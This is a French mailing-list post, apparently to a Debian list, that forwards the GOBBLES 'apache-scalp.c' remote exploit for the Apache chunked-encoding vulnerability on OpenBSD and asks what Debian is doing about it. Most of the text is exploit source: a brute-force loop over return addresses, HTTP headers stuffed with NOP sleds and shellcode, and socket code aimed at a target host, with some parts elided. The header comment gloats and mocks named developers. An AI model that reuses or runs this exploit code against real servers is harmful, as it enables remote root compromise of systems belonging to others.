Viens d'arriver dans mon mail !

Un nouvel exploit root d'Apache. Une suite à l'histoire d'ISS.

Que fait Debian sur ceci. Je n'ai pas l'info.

Stef...




/*
 * apache-scalp.c
 * OPENBSD/X86 APACHE REMOTE EXPLOIT!!!!!!!
 *
 * ROBUST, RELIABLE, USER-FRIENDLY MOTHERFUCKING 0DAY WAREZ!
 *
 * BLING! BLING! --- BRUTE FORCE CAPABILITIES --- BLING! BLING!
 *
 * ". . . and Doug Sniff said it was a hole in Epic."
 *
 * ---
 * Disarm you with a smile
 * And leave you like they left me here
 * To wither in denial
 * The bitterness of one who's left alone
 * ---
 *
 * Remote OpenBSD/Apache exploit for the "chunking" vulnerability. Kudos to
 * the OpenBSD developers (Theo, DugSong, jnathan, [EMAIL PROTECTED], ...) and
 * their crappy memcpy implementation that makes this 32-bit impossibility
 * very easy to accomplish. This vulnerability was recently rediscovered by
a slew
 * of researchers.
 *
 * The "experts" have already concurred that this bug...
 *      -       Can not be exploited on 32-bit *nix variants
 *      -       Is only exploitable on win32 platforms
 *      -       Is only exploitable on certain 64-bit systems
 *
 * However, contrary to what ISS would have you believe, we have
 * successfully exploited this hole on the following operating systems:
 *
 *      Sun Solaris 6-8 (sparc/x86)
 *      FreeBSD 4.3-4.5 (x86)
 *      OpenBSD 2.6-3.1 (x86)
 *      Linux (GNU) 2.4 (x86)
 *
 * Don't get discouraged too quickly in your own research. It took us close
 * to two months to be able to exploit each of the above operating systems.
 * There is a peculiarity to be found for each operating system that makes
the
 * exploitation possible.
 *
 * Don't email us asking for technical help or begging for warez. We are
 * busy working on many other wonderful things, including other remotely
 * exploitable holes in Apache. Perhaps The Great Pr0ix would like to inform
 * the community that those holes don't exist? We wonder who's paying her.
 *
 * This code is an early version from when we first began researching the
 * vulnerability. It should spawn a shell on any unpatched OpenBSD system
 * running the Apache webserver.
 *
 * We appreciate The Blue Boar's effort to allow us to post to his mailing
 * list once again. Because he finally allowed us to post, we now have this
 * very humble offering.
 *
 * This is a very serious vulnerability. After disclosing this exploit, we
 * hope to have gained immense fame and glory.
 *
 * Testbeds: synnergy.net, monkey.org, 9mm.com
 *
 * Abusing the right syscalls, any exploit against OpenBSD == root. Kernel
 * bugs are great.
 *
 * [#!GOBBLES QUOTES]
 *
 * --- you just know 28923034839303 admins out there running
 *     OpenBSD/Apache are going "ugh..not exploitable..ill do it after the
 *     weekend"
 * --- "Five years without a remote hole in the default install". default
 *      package = kernel. if theo knew that talkd was exploitable, he'd cry.
 * --- so funny how apache.org claims it's impossible to exploit this.
 * --- how many times were we told, "ANTISEC IS NOT FOR YOU" ?
 * --- I hope Theo doesn't kill himself
 * --- heh, this is a middle finger to all those open source, anti-"m$"
 *     idiots... slashdot hippies...
 * --- they rushed to release this exploit so they could update their ISS
 *     scanner to have a module for this vulnerability, but it doesnt even
 *     work... it's just looking for win32 apache versions
 * --- no one took us seriously when we mentioned this last year. we warned
 *     them that moderation == no pie.
 * --- now try it against synnergy :>
 * --- ANOTHER BUG BITE THE DUST... VROOOOM VRRRRRRROOOOOOOOOM
 *
 * xxxx  this thing is a major exploit. do you really wanna publish it?
 * oooo  i'm not afraid of whitehats
 * xxxx  the blackhats will kill you for posting that exploit
 * oooo  blackhats are a myth
 * oooo  so i'm not worried
 * oooo  i've never seen one
 * oooo  i guess it's sort of like having god in your life
 * oooo  i don't believe there's a god
 * oooo  but if i sat down and met him
 * oooo  i wouldn't walk away thinking
 * oooo  "that was one hell of a special effect"
 * oooo  so i suppose there very well could be a blackhat somewhere
 * oooo  but i doubt it... i've seen whitehat-blackhats with their ethics
 *       and deep philosophy...
 *
 * [GOBBLES POSERS/WANNABES]
 *
 * --- [EMAIL PROTECTED] (none of us join here, but we've sniffed it)
 * --- [EMAIL PROTECTED] (low-level.net)
 *
 * GOBBLES Security
 * [EMAIL PROTECTED]
 * http://www.bugtraq.org
 *
 */


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/time.h>
#include <signal.h>


#define EXPLOIT_TIMEOUT  5 /* num seconds to wait before assuming it failed
*/
#define RET_ADDR_INC  512


#define MEMCPY_s1_OWADDR_DELTA -146
[ .... ]
#define NOP   0x41
#define PADDING_1  'A'
#define PADDING_2  'B'
#define PADDING_3  'C'

[ .... ]

};


int main(int argc, char *argv[]) {

 char           *hostp, *portp;
 unsigned char   buf[512], *expbuf, *p;
 int             i, j, lport;
 int             sock;
 int             bruteforce, owned, progress;
 u_long          retaddr;
 struct sockaddr_in sin, from;


 if(argc != 3) {
  printf("Usage: %s <target#|base address> <ip[:port]>\n", argv[0]);
  printf("  Using targets:\t./apache-scalp 3 127.0.0.1:8080\n");
  printf("  Using bruteforce:\t./apache-scalp 0x8f000 127.0.0.1:8080\n");
  printf("\n--- --- - Potential targets list - --- ----\n");
  printf("Target ID / Target specification\n");
  for(i = 0; i < sizeof(targets)/8; i++)
   printf("\t%d / %s\n", i, targets[i].type);

  return -1;
 }


[ .... ]
 for(owned = 0, progress = 0;;retaddr += RET_ADDR_INC) {

  /* skip invalid return adresses */
  i = retaddr & 0xff;
  if(i == 0x0a || i == 0x0d)
   retaddr++;
  else if(memchr(&retaddr, 0x0a, 4) || memchr(&retaddr, 0x0d, 4))
   continue;


  sock = socket(AF_INET, SOCK_STREAM, 0);
  sin.sin_family = AF_INET;
  sin.sin_addr.s_addr = inet_addr(hostp);
  sin.sin_port = htons(atoi(portp));
  if(!progress)
   printf("\n[*] Connecting.. ");

  fflush(stdout);
  if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) {
   perror("connect()");
   exit(1);
  }

  if(!progress)
   printf("connected!\n");


[ .... ]



  p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * REP_SHELLCODE)
        + ((PADSIZE_1 + (REP_RET_ADDR * 4) + REP_ZERO + 1024) *
REP_POPULATOR));

  PUT_STRING("GET / HTTP/1.1\r\nHost: apache-scalp.c\r\n");

  for (i = 0; i < REP_SHELLCODE; i++) {
   PUT_STRING("X-");
   PUT_BYTES(PADSIZE_3, PADDING_3);
   PUT_STRING(": ");
   PUT_BYTES(NOPCOUNT, NOP);
   memcpy(p, shellcode, sizeof(shellcode) - 1);
   p += sizeof(shellcode) - 1;
   PUT_STRING("\r\n");
  }

  for (i = 0; i < REP_POPULATOR; i++) {
   PUT_STRING("X-");
   PUT_BYTES(PADSIZE_1, PADDING_1);
   PUT_STRING(": ");
   for (j = 0; j < REP_RET_ADDR; j++) {
    *p++ = retaddr & 0xff;
    *p++ = (retaddr >> 8) & 0xff;
    *p++ = (retaddr >> 16) & 0xff;
    *p++ = (retaddr >> 24) & 0xff;
   }

   PUT_BYTES(REP_ZERO, 0);
   PUT_STRING("\r\n");
  }

[ .... ]

  if(progress == 1) {
   memset(buf, 0, sizeof(buf));
   sprintf(buf, "\r[*] Currently using retaddr 0x%lx, length %u, localport
%u",
    retaddr, (unsigned int)(p - expbuf), lport);
   memset(buf + strlen(buf), ' ', 74 - strlen(buf));
   puts(buf);
   if(bruteforce)
    putchar(';');
  }
  else
   putchar((rand()%2)? 'P': 'p');


  fflush(stdout);
  while (1) {
   fd_set          fds;
   int             n;
[ .... ]

  if(!bruteforce) {
   fprintf(stderr, "Ooops.. hehehe!\n");
   return -1;
  }
 }

 return 0;
}

..........................................................
.  Linux - Debian - php4 - Apache - MySQL - Infogerance  .
.   email: [EMAIL PROTECTED] - http://www.actionweb.fr   .
.     Tel: (0)141 906 100    -    Fax: (0)141 906 101    .
..........................................................


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Répondre à